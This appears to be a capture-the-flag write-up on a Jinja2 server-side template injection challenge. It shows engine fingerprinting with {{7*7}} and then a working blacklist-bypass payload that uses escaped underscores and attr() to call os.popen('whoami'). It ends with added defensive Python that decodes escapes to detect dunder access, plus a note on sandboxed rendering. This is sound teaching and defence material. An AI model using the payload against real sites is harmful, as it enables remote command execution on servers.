I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :)
This is going to be challenging, but we've got this because, based on the description…
Using this image, we can test the site to see which template engine we are working with.
${7 * 7} didn't work, {{7 * 7}} works -> {{7*'7'}} works -> Jinja2 or Twig
Based on this post, there are several payloads for bypassing this filter with Jinja2: https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('whoami')|attr('read')()}}
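Why stripping characters does not stop this, as an added example that is not part of the original writeup: the payload spells its underscores as \x5f escapes and reaches attributes through the attr filter, so a character blacklist has nothing to remove. The blocked set, the function names and the sample string (a truncated prefix of the payload above) are assumptions made for illustration, since the page does not list what the site strips.

```python
import re

# Assumption: hypothetical blacklist; the page does not say which characters are stripped.
BLOCKED = set("_.[]")

def naive_sanitize(text):
    """Character blacklist of the kind the challenge description implies."""
    return "".join(ch for ch in text if ch not in BLOCKED)

# Hex, unicode and octal escapes are resolved inside template string literals,
# so they must be resolved before inspecting the expression.
ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\([0-7]{1,3})")
EXPRESSION = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
DUNDER = re.compile(r"__\w+__")

def decode_escapes(text):
    """Turn \\x5f, \\u005f and \\137 style escapes into the characters they encode."""
    def repl(match):
        hex2, hex4, octal = match.groups()
        if hex2:
            return chr(int(hex2, 16))
        if hex4:
            return chr(int(hex4, 16))
        return chr(int(octal, 8))
    return ESCAPE.sub(repl, text)

def find_dunder_access(text):
    """Return dunder names that appear in template expressions after decoding."""
    hits = []
    for expr in EXPRESSION.findall(text):
        hits.extend(DUNDER.findall(decode_escapes(expr)))
    return hits

# Constructed sample: truncated prefix of the payload shown on this page.
SAMPLE = r"{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}"

if __name__ == "__main__":
    print("blacklist changed input:", naive_sanitize(SAMPLE) != SAMPLE)
    print("dunder names after decoding:", find_dunder_access(SAMPLE))
```

A detector like this is only a logging backstop. The fix is to pass the announcement to the template as a variable instead of rendering it as template source, or to render untrusted templates in jinja2.sandbox.SandboxedEnvironment.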
